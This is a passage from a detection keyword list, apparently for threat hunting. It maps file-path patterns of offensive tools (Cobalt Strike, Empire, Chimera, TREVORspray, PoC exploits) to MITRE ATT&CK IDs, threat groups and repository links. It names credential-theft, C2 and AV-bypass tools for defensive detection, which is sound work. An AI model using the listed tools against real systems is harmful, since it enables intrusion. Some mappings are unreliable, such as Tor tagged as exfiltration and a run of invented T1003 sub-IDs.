Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*/tmp/amass.zip*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/bin/csprecon*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/bin/subfinder*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/c2-rebind.so*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/tmp/chimera.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*/tmp/dcow *,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/timwr/CVE-2016-5195,1,0,N/A,N/A,10,935,404,2021-02-03T16:03:40Z,2016-10-21T11:19:21Z -*/tmp/FavFreak/*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - 
TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/geckodriver.tar.gz*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/gitleaks*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/host.ghost*,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,0,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z -*/tmp/mac.ghost*,offensive_tool_keyword,GhostInTheNet,Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan,T1574 - T1565 - T1055,TA0007 - TA0040 - TA0043,N/A,N/A,Sniffing & Spoofing,https://github.com/cryptolok/GhostInTheNet,1,0,N/A,7,4,359,85,2023-04-27T07:07:29Z,2017-04-22T01:53:16Z -*/tmp/metadata/na.elf*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*/tmp/metasploit_install*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/tmp/p0f.log*,offensive_tool_keyword,p0f,P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications,T1046 - T1040,TA0007 - TA0010,N/A,N/A,Sniffing & Spoofing,https://www.kali.org/tools/p0f/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tmp/payload.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*/tmp/scanrepo.tar.gz*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/truffleHog.tar.gz*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*/tmp/vt-post-*.txt*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*/tmp/vt-results-*.txt*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z 
-*/tmp/wordlist.txt*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*/tn3270-screen.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/TokenStealing*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*/TokenStripBOF*,offensive_tool_keyword,cobaltstrike,Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nick-frischkorn/TokenStripBOF,1,1,N/A,10,10,28,5,2022-06-15T21:29:24Z,2022-06-15T02:13:13Z -*/TokenTactics.git*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*/Tokenvator/*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*/tomcat-RH-root.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/tools/BeaconTool/*,offensive_tool_keyword,cobaltstrike,Practice Go programming and implement CobaltStrike's Beacon in Go,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/darkr4y/geacon,1,1,N/A,10,10,1038,224,2020-10-02T10:34:37Z,2020-02-14T14:01:29Z -*/tools/DHCP.py*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*/tools/psexec.rb*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-PsExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/Tools/spoolsystem/*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/Tools/Squeak/Squeak*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*/Tool-X.git*,offensive_tool_keyword,Tool-X,Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. 
Now Tool-X is available for Ubuntu Debian etc.,T1212 - T1566 - T1550 - T1133,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/rajkumardusad/Tool-X,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/top_mots_combo.7z*,offensive_tool_keyword,wordlists,Various wordlists FR & EN - Cracking French passwords,T1110.001,TA0006,N/A,N/A,Credential Access,https://github.com/clem9669/wordlists,1,1,N/A,N/A,2,191,44,2023-10-03T14:28:50Z,2020-10-21T14:37:53Z -*/top-usernames-shortlist.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/tor-0.*.tar.gz*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tor-consensus-checker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tor-gencert.exe*,offensive_tool_keyword,Tor,Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion - Data Exfiltration,https://github.com/r0oth3x49/Tor,1,1,N/A,N/A,2,148,44,2018-04-21T10:55:00Z,2016-09-22T11:22:33Z -*/traceroute-geolocation.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/tracers_fuzzer.cc*,offensive_tool_keyword,3snake,Tool for extracting information from newly spawned processes,T1003 - T1110 - T1552 - T1505,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/blendin/3snake,1,0,N/A,7,7,688,113,2022-02-14T17:42:10Z,2018-02-07T21:03:15Z -*/trackerjacker*,offensive_tool_keyword,trackerjacker,Like nmap for mapping wifi networks you're not connected to. 
Maps and tracks wifi networks and devices through raw 802.11 monitoring.,T1040 - T1018 - T1591,TA0007 - - TA0043,N/A,N/A,Information Gathering,https://github.com/calebmadrigal/trackerjacker,1,0,N/A,N/A,10,2537,190,2020-12-24T20:53:31Z,2016-12-18T22:01:13Z -*/Trackflaw/CVE*.py*,offensive_tool_keyword,poc,Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear,Exploitation tools,https://github.com/Trackflaw/CVE-2023-23397,1,1,N/A,N/A,1,99,24,2023-03-24T10:46:38Z,2023-03-20T16:31:54Z -*/transports/scramblesuit/*.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/trap_command.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/TreeWalker.cs*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - 
T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*/TREVORspray.git*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*/trevorspray.log*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and 
more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,1,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*/trganda/CVE-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/trganda/CVE-2022-23131,1,1,N/A,N/A,1,1,1,2022-02-24T11:50:28Z,2022-02-24T08:10:46Z -*/trick_ryuk.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/trickbot.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/tried_logins.txt*,offensive_tool_keyword,TREVORspray,TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more,T1110.003 - T1059.005 - T1071.001,TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/blacklanternsecurity/TREVORspray,1,0,N/A,10,8,795,127,2023-09-15T23:01:06Z,2020-09-06T23:02:37Z -*/TriggerLinux/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/trollsploit/*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - 